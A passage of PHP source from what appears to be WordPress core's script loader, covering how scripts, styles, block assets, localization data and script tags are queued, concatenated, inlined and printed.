* @param string[] $js_array JavaScript scripts array
* @return string[] Reordered array, if needed.
*/
function wp_prototype_before_jquery( $js_array ) {
$prototype = array_search( 'prototype', $js_array, true );
if ( false === $prototype ) {
return $js_array;
}
$jquery = array_search( 'jquery', $js_array, true );
if ( false === $jquery ) {
return $js_array;
}
if ( $prototype < $jquery ) {
return $js_array;
}
unset( $js_array[ $prototype ] );
array_splice( $js_array, $jquery, 0, 'prototype' );
return $js_array;
}
/**
* Loads localized data on print rather than initialization.
*
* These localizations require information that may not be loaded even by init.
*
* @since 2.5.0
*
* @global array $shortcode_tags
*/
function wp_just_in_time_script_localization() {
wp_localize_script(
'autosave',
'autosaveL10n',
array(
'autosaveInterval' => AUTOSAVE_INTERVAL,
'blog_id' => get_current_blog_id(),
)
);
wp_localize_script(
'mce-view',
'mceViewL10n',
array(
'shortcodes' => ! empty( $GLOBALS['shortcode_tags'] ) ? array_keys( $GLOBALS['shortcode_tags'] ) : array(),
)
);
wp_localize_script(
'word-count',
'wordCountL10n',
array(
'type' => wp_get_word_count_type(),
'shortcodes' => ! empty( $GLOBALS['shortcode_tags'] ) ? array_keys( $GLOBALS['shortcode_tags'] ) : array(),
)
);
}
/**
* Localizes the jQuery UI datepicker.
*
* @since 4.6.0
*
* @link https://api.jqueryui.com/datepicker/#options
*
* @global WP_Locale $wp_locale WordPress date and time locale object.
*/
function wp_localize_jquery_ui_datepicker() {
global $wp_locale;
if ( ! wp_script_is( 'jquery-ui-datepicker', 'enqueued' ) ) {
return;
}
// Convert the PHP date format into jQuery UI's format.
$datepicker_date_format = str_replace(
array(
'd',
'j',
'l',
'z', // Day.
'F',
'M',
'n',
'm', // Month.
'Y',
'y', // Year.
),
array(
'dd',
'd',
'DD',
'o',
'MM',
'M',
'm',
'mm',
'yy',
'y',
),
get_option( 'date_format' )
);
$datepicker_defaults = wp_json_encode(
array(
'closeText' => __( 'Close' ),
'currentText' => __( 'Today' ),
'monthNames' => array_values( $wp_locale->month ),
'monthNamesShort' => array_values( $wp_locale->month_abbrev ),
'nextText' => __( 'Next' ),
'prevText' => __( 'Previous' ),
'dayNames' => array_values( $wp_locale->weekday ),
'dayNamesShort' => array_values( $wp_locale->weekday_abbrev ),
'dayNamesMin' => array_values( $wp_locale->weekday_initial ),
'dateFormat' => $datepicker_date_format,
'firstDay' => absint( get_option( 'start_of_week' ) ),
'isRTL' => $wp_locale->is_rtl(),
),
JSON_HEX_TAG | JSON_UNESCAPED_SLASHES
);
wp_add_inline_script( 'jquery-ui-datepicker', "jQuery(function(jQuery){jQuery.datepicker.setDefaults({$datepicker_defaults});});" );
}
/**
* Localizes community events data that needs to be passed to dashboard.js.
*
* @since 4.8.0
*/
function wp_localize_community_events() {
if ( ! wp_script_is( 'dashboard' ) ) {
return;
}
require_once ABSPATH . 'wp-admin/includes/class-wp-community-events.php';
$user_id = get_current_user_id();
$saved_location = get_user_option( 'community-events-location', $user_id );
$saved_ip_address = isset( $saved_location['ip'] ) ? $saved_location['ip'] : false;
$current_ip_address = WP_Community_Events::get_unsafe_client_ip();
/*
* If the user's location is based on their IP address, then update their
* location when their IP address changes. This allows them to see events
* in their current city when travelling. Otherwise, they would always be
* shown events in the city where they were when they first loaded the
* Dashboard, which could have been months or years ago.
*/
if ( $saved_ip_address && $current_ip_address && $current_ip_address !== $saved_ip_address ) {
$saved_location['ip'] = $current_ip_address;
update_user_meta( $user_id, 'community-events-location', $saved_location );
}
$events_client = new WP_Community_Events( $user_id, $saved_location );
wp_localize_script(
'dashboard',
'communityEventsData',
array(
'nonce' => wp_create_nonce( 'community_events' ),
'cache' => $events_client->get_cached_events(),
'time_format' => get_option( 'time_format' ),
)
);
}
/**
* Administration Screen CSS for changing the styles.
*
* If installing the 'wp-admin/' directory will be replaced with './'.
*
* The $_wp_admin_css_colors global manages the Administration Screens CSS
* stylesheet that is loaded. The option that is set is 'admin_color' and is the
* color and key for the array. The value for the color key is an object with
* a 'url' parameter that has the URL path to the CSS file.
*
* The query from $src parameter will be appended to the URL that is given from
* the $_wp_admin_css_colors array value URL.
*
* @since 2.6.0
*
* @global array $_wp_admin_css_colors
*
* @param string $src Source URL.
* @param string $handle Either 'colors' or 'colors-rtl'.
* @return string|false URL path to CSS stylesheet for Administration Screens.
*/
function wp_style_loader_src( $src, $handle ) {
global $_wp_admin_css_colors;
if ( wp_installing() ) {
return preg_replace( '#^wp-admin/#', './', $src );
}
if ( 'colors' === $handle ) {
$color = get_user_option( 'admin_color' );
if ( empty( $color ) || ! isset( $_wp_admin_css_colors[ $color ] ) ) {
$color = 'fresh';
}
$color = $_wp_admin_css_colors[ $color ];
$url = $color->url;
if ( ! $url ) {
return false;
}
$parsed = parse_url( $src );
if ( isset( $parsed['query'] ) && $parsed['query'] ) {
wp_parse_str( $parsed['query'], $qv );
$url = add_query_arg( $qv, $url );
}
return $url;
}
return $src;
}
/**
* Prints the script queue in the HTML head on admin pages.
*
* Postpones the scripts that were queued for the footer.
* print_footer_scripts() is called in the footer to print these scripts.
*
* @since 2.8.0
*
* @see wp_print_scripts()
*
* @global bool $concatenate_scripts
*
* @return string[] Handles of the scripts that were printed.
*/
function print_head_scripts() {
global $concatenate_scripts;
if ( ! did_action( 'wp_print_scripts' ) ) {
/** This action is documented in wp-includes/functions.wp-scripts.php */
do_action( 'wp_print_scripts' );
}
$wp_scripts = wp_scripts();
script_concat_settings();
$wp_scripts->do_concat = $concatenate_scripts;
$wp_scripts->do_head_items();
/**
* Filters whether to print the head scripts.
*
* @since 2.8.0
*
* @param bool $print Whether to print the head scripts. Default true.
*/
if ( apply_filters( 'print_head_scripts', true ) ) {
_print_scripts();
}
$wp_scripts->reset();
return $wp_scripts->done;
}
/**
* Prints the scripts that were queued for the footer or too late for the HTML head.
*
* @since 2.8.0
*
* @global WP_Scripts $wp_scripts
* @global bool $concatenate_scripts
*
* @return string[] Handles of the scripts that were printed.
*/
function print_footer_scripts() {
global $wp_scripts, $concatenate_scripts;
if ( ! ( $wp_scripts instanceof WP_Scripts ) ) {
return array(); // No need to run if not instantiated.
}
script_concat_settings();
$wp_scripts->do_concat = $concatenate_scripts;
$wp_scripts->do_footer_items();
/**
* Filters whether to print the footer scripts.
*
* @since 2.8.0
*
* @param bool $print Whether to print the footer scripts. Default true.
*/
if ( apply_filters( 'print_footer_scripts', true ) ) {
_print_scripts();
}
$wp_scripts->reset();
return $wp_scripts->done;
}
/**
* Prints scripts (internal use only)
*
* @since 2.8.0
*
* @ignore
*
* @global WP_Scripts $wp_scripts
* @global bool $compress_scripts
*/
function _print_scripts() {
global $wp_scripts, $compress_scripts;
$zip = $compress_scripts ? 1 : 0;
if ( $zip && defined( 'ENFORCE_GZIP' ) && ENFORCE_GZIP ) {
$zip = 'gzip';
}
$concat = trim( $wp_scripts->concat, ', ' );
$type_attr = current_theme_supports( 'html5', 'script' ) ? '' : " type='text/javascript'";
if ( $concat ) {
if ( ! empty( $wp_scripts->print_code ) ) {
echo "\n<script{$type_attr}>\n";
echo "/* <![CDATA[ */\n"; // Not needed in HTML 5.
echo $wp_scripts->print_code;
echo sprintf( "\n//# sourceURL=%s\n", rawurlencode( 'js-inline-concat-' . $concat ) );
echo "/* ]]> */\n";
echo "</script>\n";
}
$concat = str_split( $concat, 128 );
$concatenated = '';
foreach ( $concat as $key => $chunk ) {
$concatenated .= "&load%5Bchunk_{$key}%5D={$chunk}";
}
$src = $wp_scripts->base_url . "/wp-admin/load-scripts.php?c={$zip}" . $concatenated . '&ver=' . $wp_scripts->default_version;
echo "<script{$type_attr} src='" . esc_attr( $src ) . "'></script>\n";
}
if ( ! empty( $wp_scripts->print_html ) ) {
echo $wp_scripts->print_html;
}
}
/**
* Prints the script queue in the HTML head on the front end.
*
* Postpones the scripts that were queued for the footer.
* wp_print_footer_scripts() is called in the footer to print these scripts.
*
* @since 2.8.0
*
* @global WP_Scripts $wp_scripts
*
* @return string[] Handles of the scripts that were printed.
*/
function wp_print_head_scripts() {
global $wp_scripts;
if ( ! did_action( 'wp_print_scripts' ) ) {
/** This action is documented in wp-includes/functions.wp-scripts.php */
do_action( 'wp_print_scripts' );
}
if ( ! ( $wp_scripts instanceof WP_Scripts ) ) {
return array(); // No need to run if nothing is queued.
}
return print_head_scripts();
}
/**
* Private, for use in *_footer_scripts hooks
*
* In classic themes, when block styles are loaded on demand via wp_load_classic_theme_block_styles_on_demand(),
* this function is replaced by a closure in wp_hoist_late_printed_styles() which will capture the printing of
* two sets of "late" styles to be hoisted to the HEAD by means of the template enhancement output buffer:
*
* 1. Styles related to blocks are inserted right after the wp-block-library stylesheet.
* 2. All other styles are appended to the end of the HEAD.
*
* The closure calls print_footer_scripts() to print scripts in the footer as usual.
*
* @since 3.3.0
*/
function _wp_footer_scripts() {
print_late_styles();
print_footer_scripts();
}
/**
* Hooks to print the scripts and styles in the footer.
*
* @since 2.8.0
*/
function wp_print_footer_scripts() {
/**
* Fires when footer scripts are printed.
*
* @since 2.8.0
*/
do_action( 'wp_print_footer_scripts' );
}
/**
* Wrapper for do_action( 'wp_enqueue_scripts' ).
*
* Allows plugins to queue scripts for the front end using wp_enqueue_script().
* Runs first in wp_head() where all is_home(), is_page(), etc. functions are available.
*
* @since 2.8.0
*/
function wp_enqueue_scripts() {
/**
* Fires when scripts and styles are enqueued.
*
* @since 2.8.0
*/
do_action( 'wp_enqueue_scripts' );
}
/**
* Prints the styles queue in the HTML head on admin pages.
*
* @since 2.8.0
*
* @global bool $concatenate_scripts
*
* @return string[] Handles of the styles that were printed.
*/
function print_admin_styles() {
global $concatenate_scripts;
$wp_styles = wp_styles();
script_concat_settings();
$wp_styles->do_concat = $concatenate_scripts;
$wp_styles->do_items( false );
/**
* Filters whether to print the admin styles.
*
* @since 2.8.0
*
* @param bool $print Whether to print the admin styles. Default true.
*/
if ( apply_filters( 'print_admin_styles', true ) ) {
_print_styles();
}
$wp_styles->reset();
return $wp_styles->done;
}
/**
* Prints the styles that were queued too late for the HTML head.
*
* @since 3.3.0
*
* @global WP_Styles $wp_styles
* @global bool $concatenate_scripts
*
* @return array|void
*/
function print_late_styles() {
global $wp_styles, $concatenate_scripts;
if ( ! ( $wp_styles instanceof WP_Styles ) ) {
return;
}
script_concat_settings();
$wp_styles->do_concat = $concatenate_scripts;
$wp_styles->do_footer_items();
/**
* Filters whether to print the styles queued too late for the HTML head.
*
* @since 3.3.0
*
* @param bool $print Whether to print the 'late' styles. Default true.
*/
if ( apply_filters( 'print_late_styles', true ) ) {
_print_styles();
}
$wp_styles->reset();
return $wp_styles->done;
}
/**
* Prints styles (internal use only).
*
* @ignore
* @since 3.3.0
*
* @global bool $compress_css
*/
function _print_styles() {
global $compress_css;
$wp_styles = wp_styles();
$zip = $compress_css ? 1 : 0;
if ( $zip && defined( 'ENFORCE_GZIP' ) && ENFORCE_GZIP ) {
$zip = 'gzip';
}
$concat = trim( $wp_styles->concat, ', ' );
$type_attr = current_theme_supports( 'html5', 'style' ) ? '' : ' type="text/css"';
if ( $concat ) {
$dir = $wp_styles->text_direction;
$ver = $wp_styles->default_version;
$concat_source_url = 'css-inline-concat-' . $concat;
$concat = str_split( $concat, 128 );
$concatenated = '';
foreach ( $concat as $key => $chunk ) {
$concatenated .= "&load%5Bchunk_{$key}%5D={$chunk}";
}
$href = $wp_styles->base_url . "/wp-admin/load-styles.php?c={$zip}&dir={$dir}" . $concatenated . '&ver=' . $ver;
echo "<link rel='stylesheet' href='" . esc_attr( $href ) . "'{$type_attr} media='all' />\n";
if ( ! empty( $wp_styles->print_code ) ) {
echo "<style{$type_attr}>\n";
echo $wp_styles->print_code;
echo sprintf( "\n/*# sourceURL=%s */", rawurlencode( $concat_source_url ) );
echo "\n</style>\n";
}
}
if ( ! empty( $wp_styles->print_html ) ) {
echo $wp_styles->print_html;
}
}
/**
* Determines the concatenation and compression settings for scripts and styles.
*
* @since 2.8.0
*
* @global bool $concatenate_scripts
* @global bool $compress_scripts
* @global bool $compress_css
*/
function script_concat_settings() {
global $concatenate_scripts, $compress_scripts, $compress_css;
$compressed_output = ( ini_get( 'zlib.output_compression' ) || 'ob_gzhandler' === ini_get( 'output_handler' ) );
$can_compress_scripts = ! wp_installing() && get_site_option( 'can_compress_scripts' );
if ( ! isset( $concatenate_scripts ) ) {
$concatenate_scripts = defined( 'CONCATENATE_SCRIPTS' ) ? CONCATENATE_SCRIPTS : true;
if ( ( ! is_admin() && ! did_action( 'login_init' ) ) || ( defined( 'SCRIPT_DEBUG' ) && SCRIPT_DEBUG ) ) {
$concatenate_scripts = false;
}
}
if ( ! isset( $compress_scripts ) ) {
$compress_scripts = defined( 'COMPRESS_SCRIPTS' ) ? COMPRESS_SCRIPTS : true;
if ( $compress_scripts && ( ! $can_compress_scripts || $compressed_output ) ) {
$compress_scripts = false;
}
}
if ( ! isset( $compress_css ) ) {
$compress_css = defined( 'COMPRESS_CSS' ) ? COMPRESS_CSS : true;
if ( $compress_css && ( ! $can_compress_scripts || $compressed_output ) ) {
$compress_css = false;
}
}
}
/**
* Handles the enqueueing of block scripts and styles that are common to both
* the editor and the front-end.
*
* @since 5.0.0
*/
function wp_common_block_scripts_and_styles() {
if ( is_admin() && ! wp_should_load_block_editor_scripts_and_styles() ) {
return;
}
wp_enqueue_style( 'wp-block-library' );
if ( current_theme_supports( 'wp-block-styles' ) && ! wp_should_load_separate_core_block_assets() ) {
wp_enqueue_style( 'wp-block-library-theme' );
}
/**
* Fires after enqueuing block assets for both editor and front-end.
*
* Call `add_action` on any hook before 'wp_enqueue_scripts'.
*
* In the function call you supply, simply use `wp_enqueue_script` and
* `wp_enqueue_style` to add your functionality to the Gutenberg editor.
*
* @since 5.0.0
*/
do_action( 'enqueue_block_assets' );
}
/**
* Applies a filter to the list of style nodes that comes from WP_Theme_JSON::get_style_nodes().
*
* This particular filter removes all of the blocks from the array.
*
* We want WP_Theme_JSON to be ignorant of the implementation details of how the CSS is being used.
* This filter allows us to modify the output of WP_Theme_JSON depending on whether or not we are
* loading separate assets, without making the class aware of that detail.
*
* @since 6.1.0
*
* @param array $nodes The nodes to filter.
* @return array A filtered array of style nodes.
*/
function wp_filter_out_block_nodes( $nodes ) {
return array_filter(
$nodes,
static function ( $node ) {
return ! in_array( 'blocks', $node['path'], true );
},
ARRAY_FILTER_USE_BOTH
);
}
/**
* Enqueues the global styles defined via theme.json.
*
* @since 5.8.0
*/
function wp_enqueue_global_styles() {
$assets_on_demand = wp_should_load_block_assets_on_demand();
$is_block_theme = wp_is_block_theme();
$is_classic_theme = ! $is_block_theme;
/*
* Global styles should be printed in the head for block themes, or for classic themes when loading assets on
* demand is disabled, which is the default.
* The footer should only be used for classic themes when loading assets on demand is enabled.
*
* See https://core.trac.wordpress.org/ticket/53494 and https://core.trac.wordpress.org/ticket/61965.
*/
if (
( $is_block_theme && doing_action( 'wp_footer' ) ) ||
( $is_classic_theme && doing_action( 'wp_footer' ) && ! $assets_on_demand ) ||
( $is_classic_theme && doing_action( 'wp_enqueue_scripts' ) && $assets_on_demand )
) {
return;
}
/*
* If loading the CSS for each block separately, then load the theme.json CSS conditionally.
* This removes the CSS from the global-styles stylesheet and adds it to the inline CSS for each block.
* This filter must be registered before calling wp_get_global_stylesheet();
*/
add_filter( 'wp_theme_json_get_style_nodes', 'wp_filter_out_block_nodes' );
$stylesheet = wp_get_global_stylesheet();
if ( $is_block_theme ) {
/*
* Dequeue the Customizer's custom CSS
* and add it before the global styles custom CSS.
*/
remove_action( 'wp_head', 'wp_custom_css_cb', 101 );
/*
* Get the custom CSS from the Customizer and add it to the global stylesheet.
* Always do this in Customizer preview for the sake of live preview since it be empty.
*/
$custom_css = trim( wp_get_custom_css() );
if ( $custom_css || is_customize_preview() ) {
if ( is_customize_preview() ) {
/*
* When in the Customizer preview, wrap the Custom CSS in milestone comments to allow customize-preview.js
* to locate the CSS to replace for live previewing. Make sure that the milestone comments are omitted from
* the stored Custom CSS if by chance someone tried to add them, which would be highly unlikely, but it
* would break live previewing.
*/
$before_milestone = '/*BEGIN_CUSTOMIZER_CUSTOM_CSS*/';
$after_milestone = '/*END_CUSTOMIZER_CUSTOM_CSS*/';
$custom_css = str_replace( array( $before_milestone, $after_milestone ), '', $custom_css );
$custom_css = $before_milestone . "\n" . $custom_css . "\n" . $after_milestone;
}
$custom_css = "\n" . $custom_css;
}
$stylesheet .= $custom_css;
// Add the global styles custom CSS at the end.
$stylesheet .= wp_get_global_stylesheet( array( 'custom-css' ) );
}
if ( empty( $stylesheet ) ) {
return;
}
wp_register_style( 'global-styles', false );
wp_add_inline_style( 'global-styles', $stylesheet );
wp_enqueue_style( 'global-styles' );
// Add each block as an inline css.
wp_add_global_styles_for_blocks();
}
/**
* Checks if the editor scripts and styles for all registered block types
* should be enqueued on the current screen.
*
* @since 5.6.0
*
* @global WP_Screen $current_screen WordPress current screen object.
*
* @return bool Whether scripts and styles should be enqueued.
*/
function wp_should_load_block_editor_scripts_and_styles() {
global $current_screen;
$is_block_editor_screen = ( $current_screen instanceof WP_Screen ) && $current_screen->is_block_editor();
/**
* Filters the flag that decides whether or not block editor scripts and styles
* are going to be enqueued on the current screen.
*
* @since 5.6.0
*
* @param bool $is_block_editor_screen Current value of the flag.
*/
return apply_filters( 'should_load_block_editor_scripts_and_styles', $is_block_editor_screen );
}
/**
* Checks whether separate styles should be loaded for core blocks.
*
* When this function returns true, other functions ensure that core blocks use their own separate stylesheets.
* When this function returns false, all core blocks will use the single combined 'wp-block-library' stylesheet.
*
* As a side effect, the return value will by default result in block assets to be loaded on demand, via the
* {@see wp_should_load_block_assets_on_demand()} function. This behavior can be separately altered via that function.
*
* This only affects front end and not the block editor screens.
*
* @since 5.8.0
* @see @see wp_should_load_block_assets_on_demand()
* @see wp_enqueue_registered_block_scripts_and_styles()
* @see register_block_style_handle()
*
* @return bool Whether separate core block assets will be loaded.
*/
function wp_should_load_separate_core_block_assets() {
if ( is_admin() || is_feed() || wp_is_rest_endpoint() ) {
return false;
}
/**
* Filters whether block styles should be loaded separately.
*
* Returning false loads all core block assets, regardless of whether they are rendered
* in a page or not. Returning true loads core block assets only when they are rendered.
*
* @since 5.8.0
*
* @param bool $load_separate_assets Whether separate assets will be loaded.
* Default false (all block assets are loaded, even when not used).
*/
return apply_filters( 'should_load_separate_core_block_assets', false );
}
/**
* Checks whether block styles should be loaded only on-render.
*
* When this function returns true, other functions ensure that blocks only load their assets on-render.
* When this function returns false, all block assets are loaded regardless of whether they are rendered in a page.
*
* The default return value depends on the result of {@see wp_should_load_separate_core_block_assets()}, which controls
* whether Core block stylesheets should be loaded separately or via a combined 'wp-block-library' stylesheet.
*
* This only affects front end and not the block editor screens.
*
* @since 6.8.0
* @see wp_should_load_separate_core_block_assets()
*
* @return bool Whether to load block assets only when they are rendered.
*/
function wp_should_load_block_assets_on_demand() {
if ( is_admin() || is_feed() || wp_is_rest_endpoint() ) {
return false;
}
/*
* For backward compatibility, the default return value for this function is based on the return value of
* `wp_should_load_separate_core_block_assets()`. Initially, this function used to control both of these concerns.
*/
$load_assets_on_demand = wp_should_load_separate_core_block_assets();
/**
* Filters whether block styles should be loaded on demand.
*
* Returning false loads all block assets, regardless of whether they are rendered in a page or not.
* Returning true loads block assets only when they are rendered.
*
* The default value of the filter depends on the result of {@see wp_should_load_separate_core_block_assets()},
* which controls whether Core block stylesheets should be loaded separately or via a combined 'wp-block-library'
* stylesheet.
*
* @since 6.8.0
*
* @param bool $load_assets_on_demand Whether to load block assets only when they are rendered.
*/
return apply_filters( 'should_load_block_assets_on_demand', $load_assets_on_demand );
}
/**
* Enqueues registered block scripts and styles, depending on current rendered
* context (only enqueuing editor scripts while in context of the editor).
*
* @since 5.0.0
*/
function wp_enqueue_registered_block_scripts_and_styles() {
if ( wp_should_load_block_assets_on_demand() ) {
return;
}
$load_editor_scripts_and_styles = is_admin() && wp_should_load_block_editor_scripts_and_styles();
$block_registry = WP_Block_Type_Registry::get_instance();
/*
* Block styles are only enqueued if they're registered. For core blocks, this is only the case if
* `wp_should_load_separate_core_block_assets()` returns true. Otherwise they use the single combined
* 'wp-block-library` stylesheet. See also `register_core_block_style_handles()`.
* Since `wp_enqueue_style()` does not trigger warnings if the style is not registered, it is okay to not cater for
* this behavior here and simply call `wp_enqueue_style()` unconditionally.
*/
foreach ( $block_registry->get_all_registered() as $block_name => $block_type ) {
// Front-end and editor styles.
foreach ( $block_type->style_handles as $style_handle ) {
wp_enqueue_style( $style_handle );
}
// Front-end and editor scripts.
foreach ( $block_type->script_handles as $script_handle ) {
wp_enqueue_script( $script_handle );
}
if ( $load_editor_scripts_and_styles ) {
// Editor styles.
foreach ( $block_type->editor_style_handles as $editor_style_handle ) {
wp_enqueue_style( $editor_style_handle );
}
// Editor scripts.
foreach ( $block_type->editor_script_handles as $editor_script_handle ) {
wp_enqueue_script( $editor_script_handle );
}
}
}
}
/**
* Function responsible for enqueuing the styles required for block styles functionality on the editor and on the frontend.
*
* @since 5.3.0
*
* @global WP_Styles $wp_styles
*/
function enqueue_block_styles_assets() {
global $wp_styles;
$block_styles = WP_Block_Styles_Registry::get_instance()->get_all_registered();
foreach ( $block_styles as $block_name => $styles ) {
foreach ( $styles as $style_properties ) {
if ( isset( $style_properties['style_handle'] ) ) {
// If the site loads block styles on demand, enqueue the stylesheet on render.
if ( wp_should_load_block_assets_on_demand() ) {
add_filter(
'render_block',
static function ( $html, $block ) use ( $block_name, $style_properties ) {
if ( $block['blockName'] === $block_name ) {
wp_enqueue_style( $style_properties['style_handle'] );
}
return $html;
},
10,
2
);
} else {
wp_enqueue_style( $style_properties['style_handle'] );
}
}
if ( isset( $style_properties['inline_style'] ) ) {
// Default to "wp-block-library".
$handle = 'wp-block-library';
// If the site loads block styles on demand, check if the block has a stylesheet registered.
if ( wp_should_load_block_assets_on_demand() ) {
$block_stylesheet_handle = generate_block_asset_handle( $block_name, 'style' );
if ( isset( $wp_styles->registered[ $block_stylesheet_handle ] ) ) {
$handle = $block_stylesheet_handle;
}
}
// Add inline styles to the calculated handle.
wp_add_inline_style( $handle, $style_properties['inline_style'] );
}
}
}
}
/**
* Function responsible for enqueuing the assets required for block styles functionality on the editor.
*
* @since 5.3.0
*/
function enqueue_editor_block_styles_assets() {
$block_styles = WP_Block_Styles_Registry::get_instance()->get_all_registered();
$register_script_lines = array( '( function() {' );
foreach ( $block_styles as $block_name => $styles ) {
foreach ( $styles as $style_properties ) {
$block_style = array(
'name' => $style_properties['name'],
'label' => $style_properties['label'],
);
if ( isset( $style_properties['is_default'] ) ) {
$block_style['isDefault'] = $style_properties['is_default'];
}
$register_script_lines[] = sprintf(
' wp.blocks.registerBlockStyle( \'%s\', %s );',
$block_name,
wp_json_encode( $block_style, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES )
);
}
}
$register_script_lines[] = '} )();';
$inline_script = implode( "\n", $register_script_lines );
wp_register_script( 'wp-block-styles', false, array( 'wp-blocks' ), true, array( 'in_footer' => true ) );
wp_add_inline_script( 'wp-block-styles', $inline_script );
wp_enqueue_script( 'wp-block-styles' );
}
/**
* Enqueues the assets required for the block directory within the block editor.
*
* @since 5.5.0
*/
function wp_enqueue_editor_block_directory_assets() {
wp_enqueue_script( 'wp-block-directory' );
wp_enqueue_style( 'wp-block-directory' );
}
/**
* Enqueues the assets required for the format library within the block editor.
*
* @since 5.8.0
*/
function wp_enqueue_editor_format_library_assets() {
wp_enqueue_script( 'wp-format-library' );
wp_enqueue_style( 'wp-format-library' );
}
/**
* Sanitizes an attributes array into an attributes string to be placed inside a `<script>` tag.
*
* Automatically injects type attribute if needed.
* Used by {@see wp_get_script_tag()} and {@see wp_get_inline_script_tag()}.
*
* @since 5.7.0
*
* @param array $attributes Key-value pairs representing `<script>` tag attributes.
* @return string String made of sanitized `<script>` tag attributes.
*/
function wp_sanitize_script_attributes( $attributes ) {
$html5_script_support = is_admin() || current_theme_supports( 'html5', 'script' );
$attributes_string = '';
/*
* If HTML5 script tag is supported, only the attribute name is added
* to $attributes_string for entries with a boolean value, and that are true.
*/
foreach ( $attributes as $attribute_name => $attribute_value ) {
if ( is_bool( $attribute_value ) ) {
if ( $attribute_value ) {
$attributes_string .= $html5_script_support ? ' ' . esc_attr( $attribute_name ) : sprintf( ' %1$s="%2$s"', esc_attr( $attribute_name ), esc_attr( $attribute_name ) );
}
} else {
$attributes_string .= sprintf( ' %1$s="%2$s"', esc_attr( $attribute_name ), esc_attr( $attribute_value ) );
}
}
return $attributes_string;
}
/**
* Formats `<script>` loader tags.
*
* It is possible to inject attributes in the `<script>` tag via the {@see 'wp_script_attributes'} filter.
* Automatically injects type attribute if needed.
*
* @since 5.7.0
*
* @param array $attributes Key-value pairs representing `<script>` tag attributes.
* @return string String containing `<script>` opening and closing tags.
*/
function wp_get_script_tag( $attributes ) {
if ( ! isset( $attributes['type'] ) && ! is_admin() && ! current_theme_supports( 'html5', 'script' ) ) {
// Keep the type attribute as the first for legacy reasons (it has always been this way in core).
$attributes = array_merge(
array( 'type' => 'text/javascript' ),
$attributes
);
}
/**
* Filters attributes to be added to a script tag.
*
* @since 5.7.0
*
* @param array $attributes Key-value pairs representing `<script>` tag attributes.
* Only the attribute name is added to the `<script>` tag for
* entries with a boolean value, and that are true.
*/
$attributes = apply_filters( 'wp_script_attributes', $attributes );
return sprintf( "<script%s></script>\n", wp_sanitize_script_attributes( $attributes ) );
}
/**
* Prints formatted `<script>` loader tag.
*
* It is possible to inject attributes in the `<script>` tag via the {@see 'wp_script_attributes'} filter.
* Automatically injects type attribute if needed.
*
* @since 5.7.0
*
* @param array $attributes Key-value pairs representing `<script>` tag attributes.
*/
function wp_print_script_tag( $attributes ) {
echo wp_get_script_tag( $attributes );
}
/**
* Constructs an inline script tag.
*
* It is possible to inject attributes in the `<script>` tag via the {@see 'wp_inline_script_attributes'} filter.
* Automatically injects type attribute if needed.
*
* @since 5.7.0
*
* @param string $data Data for script tag: JavaScript, importmap, speculationrules, etc.
* @param array $attributes Optional. Key-value pairs representing `<script>` tag attributes.
* @return string String containing inline JavaScript code wrapped around `<script>` tag.
*/
function wp_get_inline_script_tag( $data, $attributes = array() ) {
$is_html5 = current_theme_supports( 'html5', 'script' ) || is_admin();
if ( ! isset( $attributes['type'] ) && ! $is_html5 ) {
// Keep the type attribute as the first for legacy reasons (it has always been this way in core).
$attributes = array_merge(
array( 'type' => 'text/javascript' ),
$attributes
);
}
/*
* XHTML extracts the contents of the SCRIPT element and then the XML parser
* decodes character references and other syntax elements. This can lead to
* misinterpretation of the script contents or invalid XHTML documents.
*
* Wrapping the contents in a CDATA section instructs the XML parser not to
* transform the contents of the SCRIPT element before passing them to the
* JavaScript engine.
*
* Example:
*
* <script>console.log('…');</script>
*
* In an HTML document this would print "…" to the console,
* but in an XHTML document it would print "…" to the console.
*
* <script>console.log('An image is <img> in HTML');</script>
*
* In an HTML document this would print "An image is <img> in HTML",
* but it's an invalid XHTML document because it interprets the `<img>`
* as an empty tag missing its closing `/`.
*
* @see https://www.w3.org/TR/xhtml1/#h-4.8
*/
if (
! $is_html5 &&
(
! isset( $attributes['type'] ) ||
'module' === $attributes['type'] ||
str_contains( $attributes['type'], 'javascript' ) ||
str_contains( $attributes['type'], 'ecmascript' ) ||
str_contains( $attributes['type'], 'jscript' ) ||
str_contains( $attributes['type'], 'livescript' )
)
) {
/*
* If the string `]]>` exists within the JavaScript it would break
* out of any wrapping CDATA section added here, so to start, it's
* necessary to escape that sequence which requires splitting the
* content into two CDATA sections wherever it's found.
*
* Note: it's only necessary to escape the closing `]]>` because
* an additional `<![CDATA[` leaves the contents unchanged.
*/
$data = str_replace( ']]>', ']]]]><![CDATA[>', $data );
// Wrap the entire escaped script inside a CDATA section.
$data = sprintf( "/* <![CDATA[ */\n%s\n/* ]]> */", $data );
}
$data = "\n" . trim( $data, "\n\r " ) . "\n";
/**
* Filters attributes to be added to a script tag.
*
* @since 5.7.0
*
* @param array $attributes Key-value pairs representing `<script>` tag attributes.
* Only the attribute name is added to the `<script>` tag for
* entries with a boolean value, and that are true.
* @param string $data Inline data.
*/
$attributes = apply_filters( 'wp_inline_script_attributes', $attributes, $data );
return sprintf( "<script%s>%s</script>\n", wp_sanitize_script_attributes( $attributes ), $data );
}
/**
* Prints an inline script tag.
*
* It is possible to inject attributes in the `<script>` tag via the {@see 'wp_inline_script_attributes'} filter.
* Automatically injects type attribute if needed.
*
* @since 5.7.0
*
* @param string $data Data for script tag: JavaScript, importmap, speculationrules, etc.
* @param array $attributes Optional. Key-value pairs representing `<script>` tag attributes.
*/
function wp_print_inline_script_tag( $data, $attributes = array() ) {
echo wp_get_inline_script_tag( $data, $attributes );
}
/**
* Allows small styles to be inlined.
*
* This improves performance and sustainability, and is opt-in. Stylesheets can opt in
* by adding `path` data using `wp_style_add_data`, and defining the file's absolute path:
*
* wp_style_add_data( $style_handle, 'path', $file_path );
*
* @since 5.8.0
*
* @global WP_Styles $wp_styles
*/
function wp_maybe_inline_styles() {
global $wp_styles;
$total_inline_limit = 40000;
/**
* The maximum size of inlined styles in bytes.
*
* @since 5.8.0
* @since 6.9.0 The default limit increased from 20K to 40K.
*
* @param int $total_inline_limit The file-size threshold, in bytes. Default 40000.
*/
$total_inline_limit = apply_filters( 'styles_inline_size_limit', $total_inline_limit );
$styles = array();
// Build an array of styles that have a path defined.
foreach ( $wp_styles->queue as $handle ) {
if ( ! isset( $wp_styles->registered[ $handle ] ) ) {
continue;
}
$src = $wp_styles->registered[ $handle ]->src;
$path = $wp_styles->get_data( $handle, 'path' );
if ( $path && $src ) {
$size = wp_filesize( $path );
if ( ! $size ) {
continue;
}
$styles[] = array(
'handle' => $handle,
'src' => $src,
'path' => $path,
'size' => $size,
);
}
}
